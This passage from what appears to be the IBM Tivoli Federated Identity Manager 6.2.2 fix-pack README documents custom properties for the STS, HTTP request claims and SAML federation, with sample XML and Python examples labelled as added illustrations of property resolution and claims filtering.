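    f"{IDP_BASE}_https://idp/sps/fed/saml20_https://sp/sps/fed/saml20": "False",
    f"{SP_BASE}_https://sp/sps/fed/saml20": "false",
}

if __name__ == "__main__":
    print(resolve_url_encoding(SAMPLE_PROPS, IDP_BASE,
                               "https://idp/sps/fed/saml20", "https://sp/sps/fed/saml20"))
    print(html_escaped_tokens_with_relaystate(SAMPLE_PROPS))
```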
Back to Contents
TRUST SERVICE CUSTOM PROPERTY (IV16979)
The Tivoli Federated Identity Manager 6.2.2 release adds the following Trust Service custom property:
- ivcred.insert.CRLF76
- When set to true, the base64 encoded IVCred generated by the Security Token Service module STSTokenIVCred is split into multiple lines. When set to false, the base64 encoded IVCred generated by the Security Token Service module STSTokenIVCred is not split into multiple lines.
Default value: True
- Value type: Boolean
- Example value: False
Back to Contents
TRUST SERVICE CUSTOM PROPERTY (IV18112)
The SAML STS modules validate that the token provided on the STS request is of the correct type. The STS obtains the input token either from the Base element of the RequestSecurityToken message or from the WS-Security headers included on the SOAP envelope.
If multiple security headers are included on the SOAP envelope, Tivoli Federated Identity Manager selects the very first one that it finds, even if the STS module configured to consume the token cannot handle the token type retrieved.
To enable the SAML STS modules to notify the STS of the expected token type, so that the correct token is retrieved from the SOAP envelope headers, enable the following custom property:
sts.multiple.tokens.security.header.enabled=true
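A small model of the two selection behaviours just described, added here as an example and not taken from the product: it runs over a constructed SOAP envelope carrying two WS-Security headers, the first with a UsernameToken and the second with the SAML 2.0 assertion a SAML STS module expects. The property name is the page's; the SOAP 1.1, WSS 1.0 and SAML 2.0 namespaces are the standard ones; the envelope, actor URI and token contents are constructed.

```python
"""Added example: which WS-Security token the STS hands to the consuming module,
with sts.multiple.tokens.security.header.enabled off (first token found) and on
(first token of the module's expected type)."""
import xml.etree.ElementTree as ET
from typing import Optional

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WSSE_NS = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
SAML2_NS = "urn:oasis:names:tc:SAML:2.0:assertion"
USERNAME_TOKEN = f"{{{WSSE_NS}}}UsernameToken"
SAML2_ASSERTION = f"{{{SAML2_NS}}}Assertion"
PROPERTY = "sts.multiple.tokens.security.header.enabled"

# Constructed SOAP envelope: two wsse:Security headers (distinct actors), the
# first carrying a UsernameToken, the second the SAML 2.0 assertion.
SAMPLE_ENVELOPE = f"""<soapenv:Envelope xmlns:soapenv="{SOAP_NS}">
  <soapenv:Header>
    <wsse:Security xmlns:wsse="{WSSE_NS}" soapenv:actor="urn:example:gateway">
      <wsse:UsernameToken><wsse:Username>svc-gateway</wsse:Username></wsse:UsernameToken>
    </wsse:Security>
    <wsse:Security xmlns:wsse="{WSSE_NS}">
      <saml:Assertion xmlns:saml="{SAML2_NS}" ID="_constructed" Version="2.0"
          IssueInstant="2018-04-19T00:00:00Z">
        <saml:Issuer>https://idp.example.com</saml:Issuer>
      </saml:Assertion>
    </wsse:Security>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""


def security_header_tokens(envelope_xml: str) -> list[ET.Element]:
    """All child elements of every wsse:Security header, in document order."""
    root = ET.fromstring(envelope_xml)
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return []
    tokens: list[ET.Element] = []
    for security in header.findall(f"{{{WSSE_NS}}}Security"):
        tokens.extend(list(security))
    return tokens


def select_input_token(envelope_xml: str, expected_type: str,
                       props: dict[str, str]) -> Optional[str]:
    """Return the tag of the token the STS would hand to the consuming module.

    Property disabled (the behaviour the page describes as the problem): the very
    first token found is used, whatever its type. Property enabled: the module's
    expected token type is honoured and a non-matching first token is skipped.
    """
    tokens = security_header_tokens(envelope_xml)
    if props.get(PROPERTY, "false").strip().lower() != "true":
        return tokens[0].tag if tokens else None
    for token in tokens:
        if token.tag == expected_type:
            return token.tag
    return None  # nothing of the expected type: the module should reject the request


if __name__ == "__main__":
    print(select_input_token(SAMPLE_ENVELOPE, SAML2_ASSERTION, {}))
    print(select_input_token(SAMPLE_ENVELOPE, SAML2_ASSERTION, {PROPERTY: "true"}))
```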
Back to Contents
PROVIDE HTTP REQUEST INFORMATION TO THE STS (IV17485)
- SPS.http.request.claims.enabled
- When set to true, this parameter enables the Secure Protocol Service (SPS) to include a WS-Trust claims element on the WS-Trust request to the Security Token Service. The claims element contains all the HTTP request information received at the SPS that causes the call to the Security Token Service. To avoid XML parsing problems, the values from the request are XML encoded before they are included as values in the claims element structure. The following HTTP request information is included in the claims element:
- Cookies
- HTTP headers
- HTTP request attributes
- HTTP request parameters
You can configure the runtime custom property at three levels with the following order of significance:
- Partner level
- Controls the retrieval of claims for a
specific federation and specific partner. The partner level
configuration custom property varies depending on the type of
protocol you use.
- SAML 1.X, SAML 2.0, WS-Federation, and Info Card partner level custom property:
SPS.http.request.claims.enabled%SELF_PROVIDER_ID%PARTNER_PROVIDER_ID=true
Where:
- SELF_PROVIDER_ID
- Refers to the federation provider ID.
- PARTNER_PROVIDER_ID
- Refers to the partner provider ID.
SAML 2.0 example:
SPS.http.request.claims.enabled%https://saml20sp:444/FIM/sps/saml20sp/saml20%https://saml20ip/FIM/sps/saml20ip/saml20
- OpenID partner level custom property:
- The format of the partner level custom property for OpenID varies depending on whether you have an Identity Provider or a Service Provider federation.
- OpenID partner level custom property at the Identity Provider:
SPS.http.request.claims.enabled%SELF_PROVIDER_ID%ADVERTISED_TRUST_ROOT
- OpenID partner level custom property at the Service Provider:
SPS.http.request.claims.enabled%SELF_PROVIDER_ID%OPENID_SERVER_ENDPOINT
Where:
- SELF_PROVIDER_ID
- Refers to the federation provider ID.
- ADVERTISED_TRUST_ROOT
- Refers to the advertised trust root key value from the request.
- OPENID_SERVER_ENDPOINT
- Refers to the server endpoint included on the request.
OpenID Identity Provider example:
SPS.http.request.claims.enabled%https://fimabcip:9443/sps/openidip/openid%https://fimxyzsp:9443/
OpenID Service Provider example:
SPS.http.request.claims.enabled%https://fimxyzsp:9443/sps/openidsp/openid%https://fimabcip:9443/sps/openidip/openid/sso
- OAuth partner level custom property:
SPS.http.request.claims.enabled%SELF_PROVIDER_ID%CLIENT_ID
Where:
- SELF_PROVIDER_ID
- Refers to the federation provider ID.
- CLIENT_ID
- Refers to the client ID value.
OAuth example:
SPS.http.request.claims.enabled%https://fimabc:9443/sps/oauth20fed1/oauth20%Adxfwregw5mL8oP90gZz
- Federation level
- Controls the retrieval of claims for a specific federation and all its partners.
Federation level custom property:
SPS.http.request.claims.enabled%SELF_PROVIDER_ID=true
Example:
SPS.http.request.claims.enabled%https://saml20sp:444/FIM/sps/saml20sp/saml20=true
Where:
- SELF_PROVIDER_ID
- Refers to the federation provider ID.
- Global level
- Controls the retrieval of claims for all federations and partners.
Configuration example:
SPS.http.request.claims.enabled=true
- Default value: False
- Value type: Integer
- Example value: True
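The three-level lookup described above (partner, then federation, then global), as an added example written for this README and not IBM code. It builds the `%`-separated keys of SPS.http.request.claims.enabled from the provider IDs and returns the first one present, which is also the order the RelayState settings are consulted in the earlier section. The property values, provider IDs and function names are constructed assumptions.

```python
# Constructed sample runtime custom properties (not from a real TFIM deployment).
SELF_ID = "https://saml20sp:444/FIM/sps/saml20sp/saml20"       # federation provider ID
PARTNER_ID = "https://saml20ip/FIM/sps/saml20ip/saml20"        # partner provider ID
OTHER_PARTNER = "https://otherip.example/FIM/sps/saml20ip/saml20"
OTHER_FED = "https://saml11sp:444/FIM/sps/saml11sp/saml11"

PROPERTY = "SPS.http.request.claims.enabled"
PROPERTIES = {
    PROPERTY: "true",                                  # global level
    f"{PROPERTY}%{SELF_ID}": "false",                  # federation level
    f"{PROPERTY}%{SELF_ID}%{PARTNER_ID}": "true",      # partner level
}


def candidate_keys(name, self_provider_id, partner_key=None):
    """Keys from most to least specific: partner, federation, global.

    partner_key is whatever the protocol uses to identify the partner: the partner
    provider ID for SAML/WS-Federation, the advertised trust root or OpenID server
    endpoint for OpenID, or the client ID for OAuth.
    """
    keys = []
    if partner_key is not None:
        keys.append(f"{name}%{self_provider_id}%{partner_key}")
    keys.append(f"{name}%{self_provider_id}")
    keys.append(name)
    return keys


def resolve_boolean(props, name, self_provider_id, partner_key=None, default=False):
    """Return (value, key_that_decided).

    The first key present wins, so a partner-level setting overrides a
    federation-level one, which overrides the global setting.
    """
    for key in candidate_keys(name, self_provider_id, partner_key):
        if key in props:
            return props[key].strip().lower() == "true", key
    return default, None
```

With the constructed properties, claims are collected for the one partner that is explicitly enabled, disabled for every other partner of that federation, and enabled globally for all other federations.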
The request cookies, headers, and parameters in an HTTP request might be numerous and result in a large claims element. You can filter the request cookies, headers, and parameters by using a custom property. Use the custom property to avoid including information that cannot be processed by the Security Token Service.
Use the following custom property to specify the request cookies, headers, and parameters to include in the claims element.
The custom property name is: SPS.http.request.claims.filter.spec
For each data type, you can choose to add all values or filter the values based on the item name.
The default filter is: cookies=*:headers=*
The default filter causes all cookies and headers to be included and excludes all parameters.
The format for the filter specification syntax is:
cookies=[*|cookieName1,cookieName2]:headers=[*|header1,header2]:parameters=[*|param1,param2]
An example of using the custom property to enable all the cookies, headers, and parameters is:
SPS.http.request.claims.filter.spec = cookies=*:headers=*:parameters=*
The resulting HTTPRequestClaims
element is:
<HTTPRequestClaims xmlns="urn:ibm:names:ITFIM:httprequest">
<Attributes>
<Attribute Name="remoteAddress"
Type="urn:ibm:names:ITFIM:httprequest:remoteAddress">
<Value>127.0.0.1</Value>
</Attribute>
<Attribute Name="remoteHost" Type="urn:ibm:names:
ITFIM:httprequest:remoteHost">
<Value>fim620</Value>
</Attribute>
<Attribute Name="protocol" Type="urn:ibm:names:ITFIM:
httprequest:protocol">
<Value>HTTP</Value>
</Attribute>
<Attribute Name="method" Type="urn:ibm:names:ITFIM:
httprequest:method">
<Value>POST</Value>
</Attribute>
<Attribute Name="pathInfo" Type="urn:ibm:names:ITFIM:
httprequest:pathInfo">
<Value>/saml20sp/saml20/login</Value>
</Attribute>
<Attribute Name="queryString"
Type="urn:ibm:names:ITFIM:httprequest:queryString">
<Value>Test=value</Value>
</Attribute>
<Attribute Name="requestURI" Type="urn:ibm:names:
ITFIM:httprequest:requestURI">
<Value>/sps/saml20sp/saml20/login</Value>
</Attribute>
<Locales>
<Locale Name="locales" Type="urn:ibm:names:
ITFIM:httprequest:locales">
<Value>en_US</Value>
<Value>en</Value>
</Locale>
</Locales>
</Attributes>
<Headers>
<Header Name="iv-creds" Type="urn:ibm:names:ITFIM:
httprequest:headers">
<Value>Version=1,
BAKs3DCCBO0MADCCBOcwggT....WgQA
</Value>
</Header>
<Header Name="keep-alive" Type="urn:ibm:names:ITFIM:
httprequest:headers">
<Value>115</Value>
</Header>
<Header Name="accept-charset" Type="urn:ibm:names:
ITFIM:httprequest:headers">
<Value>ISO-8859-1,utf-8;q=0.7,*;q=0.7</Value>
</Header>
<Header Name="accept" Type="urn:ibm:names:ITFIM:
httprequest:headers">
<Value>text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
</Value>
</Header>
<Header Name="host" Type="urn:ibm:names:ITFIM:
httprequest:headers">
<Value>fim620:9081</Value>
</Header>
<Header Name="iv-user" Type="urn:ibm:names:
ITFIM:httprequest:headers">
<Value>elain</Value>
</Header>
<Header Name="referer" Type="urn:ibm:names:ITFIM:
httprequest:headers">
<Value>https://saml20ip/FIM/sps/saml20ip/saml20/
login?SAMLRequest=nVNdT8IwFP0rS....d%2FmV928%3D
</Value>
</Header>
<Header Name="via" Type="urn:ibm:names:ITFIM:
httprequest:headers">
<Value>HTTP/1.1 fim620:444</Value>
</Header>
<Header Name="content-type" Type="urn:ibm:names:
ITFIM:httprequest:headers">
<Value>application/x-www-form-urlencoded</Value>
</Header>
<Header Name="iv-groups" Type="urn:ibm:names:ITFIM:
httprequest:headers">
<Value />
</Header>
<Header Name="iv_server_name" Type="urn:ibm:names:
ITFIM:httprequest:headers">
<Value>webseald-sp-webseald-localhost</Value>
</Header>
<Header Name="user_session_id" Type="urn:ibm:names:
ITFIM:httprequest:headers">
<Value>bG9jYWxob3N0LXdlYnNlYWxkLXNwAA==_9ZlLTwIAAAAwA
AAAgB1uCTNsc1Y3Mk5Nc2N4WnpZQThTVGFIUFNleVJwcC1hRTgrU1J
sNjJadkhRT3RXYTZIVQ==:default
</Value>
</Header>
<Header Name="content-length" Type="urn:ibm:names:
ITFIM:httprequest:headers">
<Value>6245</Value>
</Header>
<Header Name="accept-language" Type="urn:ibm:names:
ITFIM:httprequest:headers">
<Value>en-us,en;q=0.5</Value>
</Header>
<Header Name="connection" Type="urn:ibm:names:ITFIM:
httprequest:headers">
<Value>close</Value>
</Header>
</Headers>
<Cookies>
<Cookie Name="fim_ivtapp_target" Type="urn:ibm:names:
ITFIM:httprequest:cookies">
<Value>https%3A%2F%2Fsaml20sp%3A444%2FFIM%2Ffimivt%
2Fprotected%2Fivtlanding.jsp
</Value>
</Cookie>
<Cookie
Name="https%3a%2f%2fsaml20sp%3a444%2ffim%2fsps%
2fsaml20sp%2fsaml20fimsaml20"
Type="urn:ibm:names:ITFIM:httprequest:cookies">
<Value>uuidbf50ca56-0135-1d3f-89fa-883ae744b81b</Value>
</Cookie>
<Cookie Name="jsessionid" Type="urn:ibm:names:ITFIM:
httprequest:cookies">
<Value>0000ZOelYEj9RH1aQVymcofXoKc:-1</Value>
</Cookie>
<Cookie Name="iv_jct" Type="urn:ibm:names:
ITFIM:httprequest:cookies">
<Value>%2FFIM</Value>
</Cookie>
</Cookies>
<Parameters>
<Parameter Name="Test"
Type="urn:ibm:names:ITFIM:httprequest:query:param">
<Value>value</Value>
</Parameter>
<Parameter Name="RelayState" Type="urn:ibm:names:
ITFIM:httprequest:body:param">
<Value>uuidbf50ca56-0135-1d3f-89fa-883ae744b81b</Value>
</Parameter>
<Parameter Name="SAMLResponse" Type="urn:ibm:names:
ITFIM:httprequest:body:param">
<Value>nVNdT8IwFP0rS....d%2FmV928%3D</Value>
</Parameter>
</Parameters>
</HTTPRequestClaims>
NOTE: The parameter attribute type value indicates whether the parameter was received using the query string or as part of the request body. For query string parameters, the type is set to urn:ibm:names:ITFIM:httprequest:query:param. For parameters received as part of the request body, the type is set to urn:ibm:names:ITFIM:httprequest:body:param.
In the following example, the cookies, headers, and parameters are filtered according to the specified values. The filter keeps only the jsessionid cookie, the host header, and the RelayState parameter:
SPS.http.request.claims.filter.spec = cookies=jsessionid:headers=host:parameters=RelayState
NOTE: The values specified for parameters are case-sensitive. The values for cookies and headers are not case-sensitive.
The resulting HTTPRequestClaims element is:
<HTTPRequestClaims xmlns="urn:ibm:names:ITFIM:httprequest">
<Attributes>
<Attribute Name="remoteAddress"
Type="urn:ibm:names:ITFIM:httprequest:remoteAddress">
<Value>127.0.0.1</Value>
</Attribute>
<Attribute Name="remoteHost"
Type="urn:ibm:names:ITFIM:httprequest:remoteHost">
<Value>fim620</Value>
</Attribute>
<Attribute Name="protocol"
Type="urn:ibm:names:ITFIM:httprequest:protocol">
<Value>HTTP</Value>
</Attribute>
<Attribute Name="method"
Type="urn:ibm:names:ITFIM:httprequest:method">
<Value>POST</Value>
</Attribute>
<Attribute Name="pathInfo"
Type="urn:ibm:names:ITFIM:httprequest:pathInfo">
<Value>/saml20sp/saml20/login</Value>
</Attribute>
<Attribute Name="queryString"
Type="urn:ibm:names:ITFIM:httprequest:queryString">
<Value>Test=value</Value>
</Attribute>
<Attribute Name="requestURI"
Type="urn:ibm:names:ITFIM:httprequest:requestURI">
<Value>/sps/saml20sp/saml20/login</Value>
</Attribute>
<Locales>
<Locale Name="locales"
Type="urn:ibm:names:ITFIM:httprequest:locales">
<Value>en_US</Value>
<Value>en</Value>
</Locale>
</Locales>
</Attributes>
<Headers>
<Header Name="host"
Type="urn:ibm:names:ITFIM:httprequest:headers">
<Value>fim620:9081</Value>
</Header>
</Headers>
<Cookies>
<Cookie Name="jsessionid"
Type="urn:ibm:names:ITFIM:httprequest:cookies">
<Value>0000sOnmzkbGcYdIcevoYRuxq0m:-1</Value>
</Cookie>
</Cookies>
<Parameters>
<Parameter Name="RelayState"
Type="urn:ibm:names:ITFIM:httprequest:body:param">
<Value>uuidbfd7cb00-0135-177e-9c06-fa9b2fb1485f</Value>
</Parameter>
</Parameters>
</HTTPRequestClaims>
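The filtering and encoding described above, as an added example written for this README (not TFIM code): it parses SPS.http.request.claims.filter.spec, applies the case-sensitivity rules from the notes (parameter names exact, cookie and header names case-insensitive), distinguishes query-string from body parameters by their Type, and serialises the selected items into an HTTPRequestClaims element with ElementTree, which XML-encodes the values. The sample request, its values, and the lower-casing of header and cookie names in the output (which mirrors the elements shown above) are assumptions.

```python
import xml.etree.ElementTree as ET

NS = "urn:ibm:names:ITFIM:httprequest"
DEFAULT_FILTER_SPEC = "cookies=*:headers=*"   # README default: all cookies and headers, no parameters
QUERY_PARAM = f"{NS}:query:param"
BODY_PARAM = f"{NS}:body:param"

# Constructed sample request (not a captured one). The Referer value deliberately carries
# characters that must be XML-encoded before going into the claims element.
SAMPLE_REQUEST = {
    "cookies": {"JSESSIONID": "0000constructedsession:-1", "iv_jct": "/FIM"},
    "headers": {"Host": "fim620:9081", "Referer": "https://idp.example/login?a=1&b=<x>"},
    "query_params": {"Test": "value"},
    "body_params": {"RelayState": "uuid-constructed-1", "SAMLResponse": "PHNhbWxwOl...."},
}


def parse_filter_spec(spec):
    """Parse cookies=[*|n1,n2]:headers=[*|h1,h2]:parameters=[*|p1,p2].

    Returns {section: "*" | set-of-names}. A section absent from the spec is excluded
    entirely, which is why the default spec drops all parameters. Item names containing
    ':' or ',' cannot be expressed in this syntax.
    """
    allowed = {}
    for part in spec.split(":"):
        if not part.strip():
            continue
        section, sep, names = part.partition("=")
        section = section.strip().lower()
        if not sep or section not in ("cookies", "headers", "parameters"):
            raise ValueError(f"bad filter section: {part!r}")
        names = names.strip()
        allowed[section] = "*" if names == "*" else {n.strip() for n in names.split(",") if n.strip()}
    return allowed


def _keep(allowed, section, name):
    rule = allowed.get(section)
    if rule is None:
        return False
    if rule == "*":
        return True
    if section == "parameters":                     # parameter names are case-sensitive
        return name in rule
    return name.lower() in {r.lower() for r in rule}  # cookie and header names are not


def select_claims(spec, request):
    """Apply the filter spec; returns the cookies, headers and typed parameters to include."""
    allowed = parse_filter_spec(spec)
    cookies = {n: v for n, v in request["cookies"].items() if _keep(allowed, "cookies", n)}
    headers = {n: v for n, v in request["headers"].items() if _keep(allowed, "headers", n)}
    params = [(n, QUERY_PARAM, v) for n, v in request["query_params"].items()
              if _keep(allowed, "parameters", n)]
    params += [(n, BODY_PARAM, v) for n, v in request["body_params"].items()
               if _keep(allowed, "parameters", n)]
    return {"cookies": cookies, "headers": headers, "parameters": params}


def claims_xml(selection):
    """Serialise to an HTTPRequestClaims element; ElementTree XML-encodes every value."""
    root = ET.Element("HTTPRequestClaims", xmlns=NS)
    hdrs = ET.SubElement(root, "Headers")
    for name, value in selection["headers"].items():
        h = ET.SubElement(hdrs, "Header", Name=name.lower(), Type=f"{NS}:headers")
        ET.SubElement(h, "Value").text = value
    cks = ET.SubElement(root, "Cookies")
    for name, value in selection["cookies"].items():
        c = ET.SubElement(cks, "Cookie", Name=name.lower(), Type=f"{NS}:cookies")
        ET.SubElement(c, "Value").text = value
    prms = ET.SubElement(root, "Parameters")
    for name, ptype, value in selection["parameters"]:
        p = ET.SubElement(prms, "Parameter", Name=name, Type=ptype)
        ET.SubElement(p, "Value").text = value
    return ET.tostring(root, encoding="unicode")
```

Building the element with an XML library rather than string concatenation is what keeps a Referer or cookie value containing `<` or `&` from breaking the claims element when the STS parses it.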
An example HTTPRequestClaims element as shown in the STSUUSER during the execution of the trust chain is:
<stsuuser:RequestSecurityToken>
.......
<stsuuser:Attribute name="Claims" type="com:tivoli:am:fim:sts:RST">
<stsuuser:Value>
<wst:Claims Dialect="urn:ibm:names:ITFIM:saml"
xmlns:wst="http://schemas.xmlsoap.org/ws/2005/02/trust">
<fimc:Saml20Claims
AssertionConsumerServiceURL=
"https://saml20sp:444/FIM/sps/saml20sp/saml20/login"
DefaultNameIDFormat=
"urn:oasis:names:tc:SAML:2.0:nameid-format:persistent"
InResponseTo="FIMREQ_ed579ffa-0134-1f44-a1f3-886448eada7e"
ProtocolProfile="urn:oasis:names:tc:SAML:2:0:profiles:SSO"
RelayState="uuided51083a-0134-1634-825f-f3cdd64676bd"
SignatureValidated="true"
Target=
"https://saml11sp:444/FIM/fimivt/protected/ivtlanding.jsp"
xmlns:fimc="urn:ibm:names:ITFIM:saml">
<fimc:PrincipalName>elain</fimc:PrincipalName>
</fimc:Saml20Claims>
</wst:Claims>
</stsuuser:Value>
<stsuuser:Value>
<wst:Claims Dialect="urn:ibm:names:ITFIM:httprequest"
xmlns:wst="http://schemas.xmlsoap.org/ws/2005/02/trust">
<HTTPRequestClaims xmlns="urn:ibm:names:ITFIM:httprequest">
........
</HTTPRequestClaims>
</wst:Claims>
</stsuuser:Value>
</stsuuser:Attribute>
.......
</stsuuser:RequestSecurityToken>
Back to Contents
MISSING OAUTH IDENTIFIER ENTRIES FROM EVENTS PAGE PANEL (IV17422)
- APAR Symptom
- OAuth event identifier entries are missing from
the Event Pages panel after upgrading to IBM® Tivoli® Federated
Identity Manager 6.2.2 or after importing existing
configuration archive.
- Error description
- Notice that the OAuth event identifier
entries are not shown in the Event Pages panel in the Integrated
Solutions Console after you upgrade to Tivoli Federated Identity
Manager 6.2.2 or after you import an existing configuration archive.
- Local fix
- About this task
- After the Tivoli Federated Identity Manager 6.2.2 fix pack is installed, follow the steps below.
- Procedure
- From the
Integrated Solutions Console navigate to .
- Click Runtime Custom Properties.
- Set a new
runtime custom property TFIM.UpgradeConfig
to true.
- Click OK.
- Click Load the configuration changes to the
Tivoli Federated Identity Manager runtime.
- Restart
WebSphere® Application Server where the Tivoli Federated Identity
Manager management service is installed.
- Results
- The OAuth event identifier entries are displayed in the Event Pages
panel.
Problem summary
Because the OAuth event identifiers are not available, the template pages cannot be customized.
- Temporary Fix
- Procedure
- Modify
the sps.xml configuration file.
ATTENTION:
The sps.xml file is a critical configuration file. Editing errors are
likely to prevent IBM Tivoli Federated Identity Manager from running.
Always maintain a backup copy if you plan to edit it and test your
changes. WebSphere Application Server must be restarted after
changing this file so that the changes are recognized by IBM
Tivoli Federated Identity Manager.
- Stop
the WebSphere Application Server.
- Open
the sps.xml file in an XML editor. The file is located in the
following default locations:
AIX, Linux, Solaris
/opt/IBM/WebSphere/AppServer/profiles/<DMGR_PROFILE>/config/itfim/<domain>/etc/sps.xml
Windows
C:\Program Files\IBM\WebSphere\AppServer\profiles\<DMGR_PROFILE>\config\itfim\<domain>\etc\sps.xml
- Review
the content of the PageConfiguration section of the sps.xml file to
determine what parameters you want to change.
- Add
the following entries for the event pages under the <sps:PageIdentifierMappings> tag.
<sps:PageIdentifierMapping location="/oauth/user_consent.html" name="/oauth/user_consent.html"/>
<sps:PageIdentifierMapping location="/oauth/clients_manager.html" name="/oauth/clients_manager.html"/>
<sps:PageIdentifierMapping location="/oauth/user_error.html" name="/oauth/user_error.html"/>
<sps:PageIdentifierMapping location="/oauth/user_response.html" name="/oauth/user_response.html"/>
<sps:PageIdentifierMapping location="/oauth/user_consent_denied.html" name="/oauth/user_consent_denied.html"/>
<sps:PageIdentifierMapping location="/oauth20/user_consent.html" name="/oauth20/user_consent.html"/>
<sps:PageIdentifierMapping location="/oauth20/clients_manager.html" name="/oauth20/clients_manager.html"/>
<sps:PageIdentifierMapping location="/oauth20/user_error.html" name="/oauth20/user_error.html"/>
<sps:PageIdentifierMapping location="/oauth20/user_response.html" name="/oauth20/user_response.html"/>
- Restart the Deployment Manager where the Tivoli Federated Identity Manager management service is installed.
- Synchronize
all the nodes.
- From
Integrated Solutions Console, navigate to .
- Click
Reload Configurations.
- Results
- The OAuth event identifier entries are displayed in the Event Pages
panel.
Back to Contents
THE TFIM KERBEROS DELEGATION STS MODULE DOES NOT SUPPORT RUNNING IN 64-BIT JVMs ON 64-BIT VERSIONS OF WINDOWS (IV15372)
The IBM® Tivoli® Federated Identity Manager version 6.2.2 fix pack supports Kerberos authentication using a 64-bit DLL.
Prerequisite:
Install Microsoft Visual C++ 2010 Redistributable Package on your computer.
Reference:
For instructions on how to configure a typical environment for Kerberos
authentication, see the IBM Tivoli Access Manager: WebSEAL Kerberos Junctions
article in the developerWorks® wiki.
NOTE: For details on using IBM Tivoli Access Manager and IBM Tivoli Federated Identity Manager to issue Kerberos authentication to Microsoft Exchange 2010 and Microsoft SharePoint 2010, see the Using Kerberos for Microsoft Windows Authentication Foundation Guide.
Back to Contents
INCORRECT ALIAS LOOKUP DURING SLO WITH UNSPECIFIED NAME ID FORMAT (APAR IV19827)
You can configure the Tivoli Federated Identity Manager Single Sign-on Protocol Service (SPS) SAML 2.0 implementation to use the urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified name identifier format. You can choose to use this name identifier format when issuing a SAML assertion in a single sign-on flow.
By default, Tivoli Federated Identity Manager treats a urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified name identifier as a urn:oasis:names:tc:SAML:2.0:nameid-format:persistent name identifier. This means that the SAML 2.0 implementation invokes the alias service to determine the user identity.
By default, the SAML 2.0 implementation calls the alias service to obtain a user alias when:
- The single sign-on was done using a urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified name identifier.
- A single logout flow is invoked.
To avoid the call to the alias service, set the DefaultNameIDFormat configuration property to urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress.
See the "Handling an unspecified name identifier" topic in the Tivoli Federated Identity Manager Knowledge Center for more information about:
- How Tivoli Federated Identity Manager handles unspecified name identifiers.
- How to configure DefaultNameIDFormat.
Back to Contents
WEBSEAL FAILOVER COOKIES WITHOUT PDACLD (APAR IV17412)
- APAR Symptom
- Tivoli Access Manager WebSEAL failover cookies do not work when Tivoli Federated Identity Manager is configured to generate IV credential tokens without using PDAcld.
About this task
After the Tivoli Federated Identity Manager 6.2.2 fix pack is installed, follow the procedure below.
Procedure
Modify the mapping rule of your federation and add the following attribute in the attribute list section of the STSUU:
<stsuuser:Attribute name="AZN_CRED_AUTH_METHOD" type="urn:ibm:names:ITFIM:5.1:accessmanager">
<stsuuser:Value>password</stsuuser:Value>
</stsuuser:Attribute>
Back to Contents
PROVIDE NONCE ON THE USC EMAIL NOTIFICATION AS SEPARATE TOKEN (APAR IV19945)
The Tivoli Federated Identity Manager User Self Care (USC) feature sends a user enrollment validation email to complete the user enrollment process.
The email includes a link that users must access to complete the enrollment process. The USC code indexes the outstanding user enrollment in the cache using a nonce value. The nonce value is added to the validation URL as a query string parameter.
The current USC only returns the nonce as part of the validation URL.
In some scenarios, you might need access to the nonce value without it being part of the validation URL.
To provide this flexibility, you can enable the USC email validation code to include two macros that can be used to generate the email content:
- @USC_VALIDATION_NONCE_NOENC@
- Nonce without URL encoding.
- @USC_VALIDATION_NONCE@
- Nonce with URL encoding.
Back to Contents
INCLUDE KEY AND REQUEST TYPE ON STS (APAR IV17871)
The Tivoli Federated Identity Manager Security Trust Service (STS) chain does not support the RequestType and KeyType elements on the RequestSecurityTokenResponse message. The RequestType value must be set to the value received on the request. The KeyType must be set to one of the values supported by WS-Trust, based on an attribute on the STSUU structure.
To enable setting the KeyType, use the following sample XSL fragment:
<xsl:template match="//stsuuser:ContextAttributes">
<stsuuser:ContextAttributes>
<!-- Add the key type to the Request Security Token Response generated by the SAML module -->
<stsuuser:Attribute
name="RequestSecurityTokenResponse.KeyType"
type="urn:ibm:names:ITFIM:5.1:accessmanager">
<stsuuser:Value>http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey</stsuuser:Value>
</stsuuser:Attribute>
</stsuuser:ContextAttributes>
</xsl:template>
The new property RequestSecurityTokenResponse.KeyType allows the administrator to set the KeyType on the RequestSecurityTokenResponse. In this scenario, the KeyType is set to http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey. For more information about other valid values, see the WS-Trust specification on the OASIS Web site.
Back to Contents
SUPPORT DYNAMIC ACS URL IN SAML 2.0 AUTHNREQUEST (IV21908)
- Symptom
- Tivoli® Federated Identity Manager
invalidates the AuthnRequest message when the Assertion Consumer
Service URL does not exactly match the configured URL.
- Cause
- By default, the Tivoli Federated Identity Manager
checks the Assertion Consumer Service URL of the authentication
request with the configured URL by exact string comparison. Tivoli
Federated Identity Manager cannot validate the authentication
requests that do not have an exact string match with the configured
URL.
- Resolving the problem
- Use a custom runtime property that contains a regex pattern for validating the Assertion Consumer Service URL of a specific federation, partner, and binding.
- There are two custom runtime properties you can use. Depending on which custom runtime property you use, Tivoli Federated Identity Manager executes the appropriate validation.
- SAML20.IDP.ACSUrlPattern_<fedId>_<partnerId> = <regex>
- Example value:
SAML20.IDP.ACSUrlPattern_https://ip.example.com/sps/saml20ip/saml20_https://sp.example.com/sps/saml20sp/saml20 = https://sp.example.com/sps/saml20sp/saml20(\\?(\\S+?)=(\\S+?))?
- SAML20.IDP.ACSUrlPattern_<fedId>_<partnerId>_<binding> = <regex>
- Example value:
SAML20.IDP.ACSUrlPattern_https://ip.example.com/sps/saml20ip/saml20_https://sp.example.com/sps/saml20sp/saml20_urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST = https://sp.example.com/sps/saml20sp/saml20(\\?(\\S+?)=(\\S+?))?
The fedId value is the provider ID in the federation properties page.
The partnerId value is the provider ID in the partner properties page.
The values for the binding are:
- urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Artifact
- urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST
